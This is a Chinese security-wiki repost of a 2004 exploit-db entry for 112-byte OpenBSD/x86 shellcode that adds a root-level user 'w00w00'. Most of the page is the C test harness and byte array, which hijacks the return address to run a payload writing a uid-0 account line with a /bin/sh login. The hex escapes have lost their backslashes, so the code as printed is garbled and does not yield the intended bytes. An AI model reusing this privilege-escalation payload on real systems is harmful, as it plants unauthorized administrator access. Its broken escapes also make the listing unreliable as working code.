OpenBSD/x86 – Add Root User (w00w00) Shellcode (112 bytes)

OpenBSD/x86 – Add Root User (w00w00) Shellcode (112 bytes)

漏洞ID 1054653 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-OpenBSD/x86 – Add Root User (w00w00) Shellcode (112 bytes)-安全小百科CVE编号 N/A
图片[2]-OpenBSD/x86 – Add Root User (w00w00) Shellcode (112 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 OpenBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13477
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#include <string.h>

char shell[]=
"xebx2bx5ex31xc0x88x46x0b"
"x88x46x29x50xb0x09x50x31"
"xc0x56x50xb0x05xcdx80x89"
"xc3x6ax1dx8dx46x0cx50x53"
"x50x31xc0xb0x04xcdx80x31"
"xc0xb0x01xcdx80xe8xd0xff"
"xffxffx2fx74x6dx70x2fx70"
"x61x73x73x77x64x30x77x30"
"x30x77x30x30x3ax3ax30x3a"
"x30x3ax77x30x30x77x30x30"
"x3ax2fx3ax2fx62x69x6ex2f"
"x73x68x0ax30xffxffxffxff"
"xffxffxffxffxffxffxffxff"
"xffxffxffxffxffxffxffxff";

main()
{
   int *ret;
   printf("n%dn",sizeof(shell));
   ret=(int*)&ret+2;
   (*ret)=(int)shell;
}

// milw0rm.com [2004-09-26]

相关推荐: Shred File Wiper Insecure File Deletion Vulnerability

Shred File Wiper Insecure File Deletion Vulnerability 漏洞ID 1103806 漏洞类型 Design Error 发布时间 2000-10-06 更新时间 2000-10-06 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享